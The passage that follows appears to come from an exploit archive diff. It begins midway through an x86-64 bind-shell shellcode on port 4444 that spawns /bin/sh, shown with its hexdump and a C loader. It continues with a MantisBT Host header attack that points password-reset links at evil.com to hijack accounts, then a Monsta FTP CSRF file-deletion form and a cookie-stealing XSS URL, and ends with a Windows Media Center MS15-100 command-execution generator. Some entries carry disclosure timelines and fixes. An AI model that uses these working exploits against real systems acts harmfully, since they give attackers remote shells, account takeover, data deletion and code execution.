xor rsi,rsi ;zero out RSI
mov sil, 0x1 ;SOCK_STREAM = 1
xor rdx, rdx ;protocol = IP = 0
;store syscall number on RAX
xor rax,rax ;zero out RAX
mov al,2 ;put 2 to AL -> RAX = 0x0000000000000002
ror rax, 0x28 ;rotate the 2 -> RAX = 0x0000000002000000
mov al,0x61 ;move 3b to AL (execve socket#) -> RAX = 0x0000000002000061
mov r12, rax ;save RAX
syscall ;trigger syscall
;bind
mov r9, rax ;save socket number
mov rdi, rax ;put return value to RDI int socket
xor rsi, rsi ;zero out RSI
push rsi ;push RSI to the stack
mov esi, 0x5c110201 ;port number 4444 (=0x115c)
sub esi,1 ;make ESI=0x5c110200
push rsi ;push RSI to the stack
mov rsi, rsp ;store address
mov dl,0x10 ;length of socket structure 0x10
add r12b, 0x7 ;RAX = 0x0000000002000068 bind
mov rax, r12 ;restore RAX
syscall
;listen
;RDI already contains the socket number
xor rsi, rsi ;zero out RSI
inc rsi ;backlog = 1
add r12b, 0x2 ;RAX = 0x000000000200006a listen
mov rax, r12 ;restore RAX
syscall
;accept 30 AUE_ACCEPT ALL { int accept(int s, caddr_t name, socklen_t *anamelen); }
;RDI already contains the socket number
xor rsi, rsi ;zero out RSI
;RDX is already zero
sub r12b, 0x4c ;RAX = 0x000000000200001e accept
mov rax, r12 ;restore RAX
syscall
;int dup2(u_int from, u_int to);
mov rdi, rax
xor rsi, rsi
add r12b, 0x3c ;RAX = 0x000000000200005a dup2
mov rax, r12 ;restore RAX
syscall
/*
$ nasm -f bin bind-shellcode.asm
$ hexdump bind-shellcode
0000000 48 31 ff 40 b7 02 48 31 f6 40 b6 01 48 31 d2 48
0000010 31 c0 b0 02 48 c1 c8 28 b0 61 49 89 c4 0f 05 49
0000020 89 c1 48 89 c7 48 31 f6 56 be 01 02 11 5c 83 ee
0000030 01 56 48 89 e6 b2 10 41 80 c4 07 4c 89 e0 0f 05
0000040 48 31 f6 48 ff c6 41 80 c4 02 4c 89 e0 0f 05 48
0000050 31 f6 41 80 ec 4c 4c 89 e0 0f 05 48 89 c7 48 31
0000060 f6 41 80 c4 3c 4c 89 e0 0f 05 48 ff c6 4c 89 e0
0000070 0f 05 48 31 f6 56 48 bf 2f 2f 62 69 6e 2f 73 68
0000080 57 48 89 e7 48 31 d2 41 80 ec 1f 4c 89 e0 0f 05
0000090
*/
//C code
//compile:
//gcc bind-shellcode.c -o bindsc
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
int (*sc)();
char shellcode[] =
"\x48\x31\xff\x40\xb7\x02\x48\x31\xf6\x40\xb6\x01\x48\x31\xd2\x48" \
"\x31\xc0\xb0\x02\x48\xc1\xc8\x28\xb0\x61\x49\x89\xc4\x0f\x05\x49" \
"\x89\xc1\x48\x89\xc7\x48\x31\xf6\x56\xbe\x01\x02\x11\x5c\x83\xee" \
"\x01\x56\x48\x89\xe6\xb2\x10\x41\x80\xc4\x07\x4c\x89\xe0\x0f\x05" \
"\x48\x31\xf6\x48\xff\xc6\x41\x80\xc4\x02\x4c\x89\xe0\x0f\x05\x48" \
"\x31\xf6\x41\x80\xec\x4c\x4c\x89\xe0\x0f\x05\x48\x89\xc7\x48\x31" \
"\xf6\x41\x80\xc4\x3c\x4c\x89\xe0\x0f\x05\x48\xff\xc6\x4c\x89\xe0" \
"\x0f\x05\x48\x31\xf6\x56\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68" \
"\x57\x48\x89\xe7\x48\x31\xd2\x41\x80\xec\x1f\x4c\x89\xe0\x0f\x05";
int main(int argc, char **argv) {
void *ptr = mmap(0, 0x90, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON
| MAP_PRIVATE, -1, 0);
if (ptr == MAP_FAILED) {
perror("mmap");
exit(-1);
}
memcpy(ptr, shellcode, sizeof(shellcode));
sc = ptr;
sc();
return 0;
}

86
platforms/php/webapps/38068.txt Executable file
View file

@ -0,0 +1,86 @@
# Exploit Title: MantisBT 1.2.19 - Host header attack vulnerability
# Date: 07-09-2015
# Exploit Author: Pier-Luc Maltais
Centre opérationnel de sécurité informatique gouvernemental (COSIG)
# Vendor Homepage: https://www.mantisbt.org/
# Software Link: http://sourceforge.net/projects/mantisbt/files/mantis-stable/
# Version: 1.2.19
# Contact: https://twitter.com/plmaltais
http://plmsecurity.net/mantis_host_header_attack
==========================
Vulnerability Description:
==========================
MantisBT 1.2.19 is vulnerable to an Host header attack that can
be exploited by an unauthenticated user to hijack another user account.
==================
Technical Details:
==================
This exploit use the Host header attack to poison the link in the
password reset mail. You need to know the victim username and
e-mail. You also need a remote host that you control to catch the
verification hash needed for password reset.
1. Access the password reset feature and fill the form with the
victim username and e-mail.
http://{VULNERABLE_MANTIS}/mantisbt/lost_pwd_page.php
2. Using an intercepting proxy like Burp, change the Host header
with your evil host.
Original request :
POST /mantisbt/lost_pwd_page.php HTTP/1.1
Host : {VULNERABLE_MANTIS}
[...]
Modified request :
POST /mantisbt/lost_pwd_page.php HTTP/1.1
Host : evil.com
[...]
3. When the user receive the e-mail, the link is poisoned with
the evil host.
[...]
visit the following URL to change your password:
http://evil.com/mantisbt/verify.php?id=1&confirm_hash=81ece020dfcd6d53e02c5323583cdead
[...]
4. Now, when the victim click on the link to reset his password,
his verification hash will be sent to our evil host. All we
have to do is access the verify.php page with his hash, so
we can change his password and hijack his account.
http://{VULNERABLE_MANTIS}/mantisbt/verify.php?id=1&confirm_hash=81ece020dfcd6d53e02c5323583cdead
=========
Solution:
=========
Use
$_SERVER['SERVER_NAME'] (server controlled)
instead of
$_SERVER['HTTP_HOST'] (client controlled)
====================
Disclosure Timeline:
====================
16/02/2015 - Found the vulnerability
17/02/2015 - Wrote this advisory
17/02/2015 - Contacted developers on MantisBT forum
18/02/2015 - Opened an issue in the bug tracker
01/09/2015 - Still not patched, releasing this advisory.
===========
References:
===========
[1] http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html
[2] http://stackoverflow.com/questions/2297403/http-host-vs-server-name/2297421#2297421

139
platforms/php/webapps/38148.txt Executable file
View file

@ -0,0 +1,139 @@
# Exploit Title: CSRF XSS Monsta FTP
# Google Dork: intitle: Monsta FTP CSRF / XSS
# Date: 2015-09-11
# Exploit Author: hyp3rlinx
# Website: hyp3rlinx.altervista.org
# Vendor Homepage: www.monstaftp.com
# Software Link: www.monstaftp.com
# Version: monsta_ftp_v1.6.2
# Tested on: windows 7 SP1 XAMPP
# Category: WebApps
Vendor:
================================
www.monstaftp.com
Product:
================================
monsta_ftp_v1.6.2
Monsta FTP is open source PHP/Ajax cloudware browser based
FTP file management web application.
Vulnerability Type:
===================
CSRF / XSS
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
CSRF:
-----
No CSRF token exists when making some POST requests, allowing arbitrary
deletion of files on the monstaftp server dirs.
XSS:
----
Monstaftp sanitizes most $_GET requests with call to sanitizeStr() e.g -->
echo sanitizeStr($ftp_host),
However we find vulnerable code that is not santized on line 494 of
index.php ---> echo $_GET["openFolder"];
creating an XSS entry point and will execute when victim accesses the
Monstaftp login page before logging in.
Exploit code(s):
===============
1) CSRF delete all server files
<body onLoad="doit()">
<script>
function doit(){
var e=document.getElementById('HELL')
e.submit()
}
<form id="HELL" action="http://localhost/monsta_ftp_v1.6.2_install/?"
method="post">
<input type="text" id="ftpAction" name="ftpAction" value="delete"/>
<input type="text" id="folderAction[]" name="folderAction[]" value=""/>
<input type="text" id="fileAction[]" name="fileAction[]"
value="~%2FSOMEFILES_TO_DELETE.php"/>
</form>
2) XSS steal PHP session ID: e.g. "PHPSESSID=7lukgqaghuqihnbj3ikcrsc715"
Logout, then access the following URL before login and BOOOOOOM!.
http://localhost/monsta_ftp_v1.6.2_install/?openFolder="/><script>alert('XSS
by hyp3rlinx '%2bdocument.cookie)</script>
Disclosure Timeline:
=========================================================
Vendor Notification: NA
Sept 11, 2015 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
=========================================================
Med
Description:
==========================================================
Request Method(s): [+] POST & GET
Vulnerable Product: [+] monsta_ftp_v1.6.2
Vulnerable Parameter(s): [+] ftpAction, fileAction[], openFolder
Affected Area(s): [+] FTP Admin Area
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx

File diff suppressed because one or more lines are too long

View file

@ -0,0 +1,22 @@
# Title: MS15-100 Windows Media Center Command Execution
# Date : 11/09/2015
# Author: R-73eN
# Software: Windows Media Center
# Tested : Windows 7 Ultimate
# CVE : 2015-2509
banner = ""
banner += " ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner
command = "calc.exe"
evil = '<application run="' + command + '"/>'
f = open("Music.mcl","w")
f.write(evil)
f.close()
print "\n[+] Music.mcl generated . . . [+]"